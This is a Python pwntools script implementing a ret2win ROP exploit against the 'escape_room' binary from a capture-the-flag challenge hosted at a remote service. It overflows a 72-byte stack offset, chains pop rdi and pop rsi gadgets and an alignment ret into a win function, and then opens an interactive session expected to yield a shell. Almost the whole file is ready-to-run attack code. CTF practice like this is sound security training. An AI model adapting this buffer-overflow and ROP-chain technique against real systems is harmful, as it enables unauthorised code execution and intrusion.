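#!/usr/bin/env python3
"""Ret2win exploit for the `escape_room` challenge binary.

Overflows a stack buffer, then uses two single-register pop gadgets to
load the two "key" arguments before returning into the win function.
Targets the remote service by default; run as `python3 exploit.py LOCAL`
to attach to a local process instead.
"""
from pwn import *

context.binary = elf = ELF("./escape_room", checksec=False)

HOST, PORT = "offsec.m0lecon.it", 13566

# Values the win function expects in its first two arguments (rdi, rsi).
KEY1 = 0xDEADBEEF  # -> rdi
KEY2 = 0xCAFEBABE  # -> rsi

# Distance from the start of the overflowed buffer to the saved return
# address. Presumably buffer + saved rbp; re-derive with a cyclic pattern
# if the binary changes.
OFFSET = 72

# Gadgets the challenge author planted in main.c. These are absolute
# addresses, so the binary is assumed non-PIE — confirm with checksec.
# The two pops sit 2 bytes apart, consistent with `pop rdi ; ret` and
# `pop rsi ; ret`; verify with ROPgadget/objdump before reuse.
POP_RDI = 0x401287
POP_RSI = 0x401289
# Bare `ret`. Inserted before win so rsp is re-aligned to 16 bytes;
# without it a glibc call inside win (e.g. system) may crash on movaps.
RET = 0x40101A
WIN = 0x40121B


def build_payload(offset: int = OFFSET, key1: int = KEY1, key2: int = KEY2) -> bytes:
    """Return the ROP chain: padding, rsi <- key2, rdi <- key1, ret, win.

    Args:
        offset: bytes of padding before the saved return address.
        key1: value loaded into rdi (first argument to win).
        key2: value loaded into rsi (second argument to win).
    """
    return flat(
        b"A" * offset,
        p64(POP_RSI), p64(key2),
        p64(POP_RDI), p64(key1),
        p64(RET),
        p64(WIN),
    )


def main() -> None:
    """Open the target (remote, or local with LOCAL) and deliver the chain."""
    if args.LOCAL:
        p = process(elf.path)
    else:
        p = remote(HOST, PORT)

    # If the service prints a prompt before reading, sync on it first:
    #   p.recvuntil(b"keys?\n")
    # Left out here because the original run worked without it.
    p.send(build_payload())

    # Hand the session over; if win drops into a shell, `cat flag` from here.
    p.interactive()


if __name__ == "__main__":
    main()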